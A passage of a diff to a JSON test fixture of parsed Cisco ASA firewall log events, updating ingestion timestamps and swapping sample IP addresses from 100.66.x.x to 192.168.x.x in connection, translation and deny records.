@@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168269500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996018600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168277600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996024800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, 
@@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168285600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.996031Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168291100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.996037300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.168296400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:33:41.996043600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, 
@@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.168302200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.996050200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168308600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:33:41.996056400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168315500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:33:41.996062600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168323500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996068900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168330500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996075100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168336300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996079800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168341300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996084800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -17656,8 +17656,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168347100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996090600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17703,8 +17703,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168352900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996096Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17750,8 +17750,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168358400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996100400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17781,8 +17781,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" 
@@ -17817,7 +17817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17828,8 +17828,8 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.168363800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.996105400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:52.000Z", @@ -17866,8 +17866,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17901,7 +17901,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17910,8 +17910,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168369700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996111700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -17947,8 +17947,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17982,7 +17982,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -17991,8 +17991,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168375500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996116300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18028,8 +18028,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18063,7 +18063,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18072,8 +18072,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168381100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996120900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18104,8 +18104,8 @@
 },
 "destination": {
 "port": 8310,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1306,
@@ -18145,7 +18145,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -18153,8 +18153,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.168386800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310",
+ "ingested": "2021-12-09T13:33:41.996125100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -18187,8 +18187,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18223,7 +18223,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18232,8 +18232,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.168394700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)",
+ "ingested": "2021-12-09T13:33:41.996129900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -18249,7 +18249,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.124.24",
+ "mapped_source_ip": "192.168.124.24",
 "connection_id": "11844",
 "source_interface": "outside",
 "mapped_destination_port": 1306
@@ -18271,8 +18271,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18306,7 +18306,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18315,8 +18315,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168402200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996136300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18352,8 +18352,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18387,7 +18387,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18396,8 +18396,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168407Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996142600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18433,8 +18433,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18468,7 +18468,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18477,8 +18477,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168412300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996148800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18514,8 +18514,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18549,7 +18549,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18558,8 +18558,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168417100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996155300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18595,8 +18595,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18630,7 +18630,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18639,8 +18639,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168422700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996161500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18676,8 +18676,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18711,7 +18711,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18720,8 +18720,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168428100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996167700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18757,8 +18757,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18792,7 +18792,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18801,8 +18801,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168435100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996175600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18838,8 +18838,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18873,7 +18873,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18882,8 +18882,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168441700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996182Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -18919,8 +18919,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -18954,7 +18954,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -18963,8 +18963,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168446900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996188300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19000,8 +19000,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19035,7 +19035,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19044,8 +19044,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168450800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996194600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19081,8 +19081,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19116,7 +19116,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19125,8 +19125,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168457400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996201300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19162,8 +19162,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
